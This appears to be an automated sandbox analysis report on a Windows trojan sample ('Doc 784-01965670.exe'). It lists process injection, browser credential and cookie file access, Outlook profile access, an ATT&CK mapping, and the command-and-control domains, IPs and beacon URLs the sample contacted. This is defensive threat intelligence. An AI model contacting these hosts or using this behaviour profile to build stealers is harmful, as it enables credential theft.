            Source: C:\Windows\SysWOW64\schtasks.exe | Thread APC queued: target process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30B5008
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0043916A LogonUserW | 0_2_0043916A
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW | 0_2_0040D6D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_004375B0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event | 0_2_00436431
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_00445DD3
            Source: jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: Doc 784-01965670.exe, jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: Doc 784-01965670.exe | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00410D10 cpuid | 0_2_00410D10
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 0_2_004223BC
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004711D2 GetUserNameW | 0_2_004711D2
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_0040E470

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Doc 784-01965670.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: Doc 784-01965670.exe | Binary or memory string: WIN_XP
            Source: Doc 784-01965670.exe | Binary or memory string: WIN_XPe
            Source: Doc 784-01965670.exe | Binary or memory string: WIN_VISTA
            Source: Doc 784-01965670.exe | Binary or memory string: WIN_7

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_004741BB
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket | 0_2_0046483C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject | 0_2_0047AD92

            MITRE ATT&CK Matrix

            The matrix is listed here by tactic, in the report's column order. A bracketed number is the report's count of matched signatures for that technique; unnumbered entries are the unmatched cells of the matrix template.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API [3]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading [1]; Valid Accounts [2]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [412]; Scheduled Task/Job [1]; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [3]; DLL Side-Loading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [412]
            Credential Access: OS Credential Dumping [1]; Input Capture [21]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [116]; Security Software Discovery [241]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery [1]
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer [5]; Encrypted Channel [1]; Non-Application Layer Protocol [5]; Application Layer Protocol [5]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph (the interactive graph is rendered here as a process tree; each node's signatures and network contacts follow it)

            Behavior Graph ID: 1539643 | Sample: Doc 784-01965670.exe | Startdate: 22/10/2024 | Architecture: WINDOWS | Score: 100
            Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
            Sample-level DNS/IP: www.sailforever.xyz; www.launchdreamidea.xyz (Performs DNS queries to domains with low reputation); 21 other IPs or domains

            Doc 784-01965670.exe (started)
                Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                svchost.exe (started)
                    Signatures: Maps a DLL or memory area into another process
                    jEsBIhfnof.exe (injected)
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        schtasks.exe (started)
                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                            jEsBIhfnof.exe (injected)
                                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                DNS/IP: www.sailforever.xyz 103.106.67.112, 53160, 53171, 53184 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand; www.givingaway123.net 103.224.182.242, 53228, 53229, 53230 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; 9 other IPs or domains
                            firefox.exe (started)

            Source | Detection | Scanner | Label | Link
            Doc 784-01965670.exe | 53% | ReversingLabs | Win32.Trojan.AutoitInject |
            Doc 784-01965670.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            217.70.184.50
            truetrue
              unknown
              booosted.xyz
              3.33.130.190
              truetrue
                unknown
                www.launchdreamidea.xyz
                188.114.96.3
                truetrue
                  unknown
                  www.drevohome.shop
                  94.23.162.163
                  truetrue
                    unknown
                    longg002.cn
                    8.210.49.139
                    truetrue
                      unknown
                      www.rudemyvague.info
                      52.13.151.179
                      truetrue
                        unknown
                        www.itemsort.shop
                        188.114.97.3
                        truetrue
                          unknown
                          030002837.xyz
                          65.21.196.90
                          truetrue
                            unknown
                            www.productanalytics.pro
                            94.23.162.163
                            truetrue
                              unknown
                              mondayigboleague.info
                              3.33.130.190
                              truetrue
                                unknown
                                www.givingaway123.net
                                103.224.182.242
                                truetrue
                                  unknown
                                  ethetf.digital
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    www.sailforever.xyz
                                    103.106.67.112
                                    truetrue
                                      unknown
                                      www.jagdud.store
                                      209.74.64.187
                                      truetrue
unknown
www.030002837.xyz | unknown | unknown | true | | unknown
www.booosted.xyz | unknown | unknown | true | | unknown
www.djazdgc.tokyo | unknown | unknown | true | | unknown
www.stocksm.fun | unknown | unknown | true | | unknown
www.mondayigboleague.info | unknown | unknown | true | | unknown
www.gws-treinamento2.shop | unknown | unknown | true | | unknown
50.23.12.20.in-addr.arpa | unknown | unknown | true | | unknown
www.kmjai8jf.icu | unknown | unknown | true | | unknown
www.ethetf.digital | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.launchdreamidea.xyz/bd77/ | true | | unknown
http://www.ethetf.digital/m7sk/ | true | | unknown
http://www.ethetf.digital/m7sk/?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZH | true | | unknown
http://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH | true | | unknown
http://www.030002837.xyz/y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA== | true | | unknown
http://www.stocksm.fun/0bvj/ | true | | unknown
http://www.booosted.xyz/12c7/?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q== | true | | unknown
http://www.productanalytics.pro/9vwi/ | true | | unknown
http://www.productanalytics.pro/9vwi/?Sx=gnM4ZH&DrelH=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32ZlZ5K0mO0jPWZdMrvyGAaZ//vvCziC5VbEt1mIxURveK1Q== | true | | unknown
http://www.030002837.xyz/y045/ | true | | unknown
http://www.itemsort.shop/qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH | true | | unknown
http://www.launchdreamidea.xyz/bd77/?Sx=gnM4ZH&DrelH=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHCyUpz7x/SzvZhSZv0Dea0KcHBDKlEtGKZJ6Ek0LYLRuKiHQ== | true | | unknown
http://www.jagdud.store/qxse/ | true | | unknown
http://www.rudemyvague.info/t7t4/ | true | | unknown
http://www.rudemyvague.info/t7t4/?DrelH=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3IkusQQuIzTW/Q+d1GThbq9ZzxZjoWmxr4FVA7qWfBnIN3A==&Sx=gnM4ZH | true | | unknown
http://www.drevohome.shop/v2k8/ | true | | unknown
http://www.drevohome.shop/v2k8/?DrelH=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM6qnxKBkcbq4MueVVV3XCfWAmAkUYQmNwrZeqvG2HfhRonQ==&Sx=gnM4ZH | true | | unknown
http://www.mondayigboleague.info/t10u/ | true | | unknown
http://www.booosted.xyz/12c7/ | true | | unknown
http://www.djazdgc.tokyo/0628/?DrelH=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+AigTeJIoAagnD1dxA2tH0NgWMQZxZA+Ob34DrkJtsSinzg==&Sx=gnM4ZH | true | | unknown
http://www.sailforever.xyz/hshp/ | true | | unknown
http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH | true | | unknown
http://www.givingaway123.net/1juc/ | true | | unknown
http://www.mondayigboleague.info/t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH | true | | unknown
http://www.stocksm.fun/0bvj/?Sx=gnM4ZH&DrelH=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYk+as1PFyE+cpyOrA06AWAI1QWZMBKp1vuYqItDMniQ0DBw== | true | | unknown
http://www.jagdud.store/qxse/?DrelH=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85P9Ge9YW+EOCG2iwxhwrHmW9o/3mDrh1ZK5nR7QXShQvwtw==&Sx=gnM4ZH | true | | unknown
http://www.djazdgc.tokyo/0628/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/?q= | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.icann.org/resources/pages/non-response-2014-01-29-en | jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://emailverification.info/ | jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gandi.net/en/domain | schtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2 | jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000004244000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.productanalytics.pro | jEsBIhfnof.exe, 00000006.00000002.4511141181.00000000056A1000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=stocksm.fun | schtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP | jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003A6A000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
8.210.49.139 | longg002.cn | Singapore | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
103.106.67.112 | www.sailforever.xyz | New Zealand | | 56030 | VOYAGERNET-AS-APVoyagerInternetLtdNZ | true
209.74.64.187 | www.jagdud.store | United States | | 31744 | MULTIBAND-NEWHOPEUS | true
65.21.196.90 | 030002837.xyz | United States | | 199592 | CP-ASDE | true
188.114.97.3 | www.itemsort.shop | European Union | | 13335 | CLOUDFLARENETUS | true
94.23.162.163 | www.drevohome.shop | France | | 16276 | OVHFR | true
188.114.96.3 | www.launchdreamidea.xyz | European Union | | 13335 | CLOUDFLARENETUS | true
103.224.182.242 | www.givingaway123.net | Australia | | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
217.70.184.50 | webredir.vip.gandi.net | France | | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
52.13.151.179 | www.rudemyvague.info | United States | | 16509 | AMAZON-02US | true
3.33.130.190 | booosted.xyz | United States | | 8987 | AMAZONEXPANSIONGB | true
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1539643
Start date and time:2024-10-22 22:55:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Doc 784-01965670.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@7/2@17/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 38
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
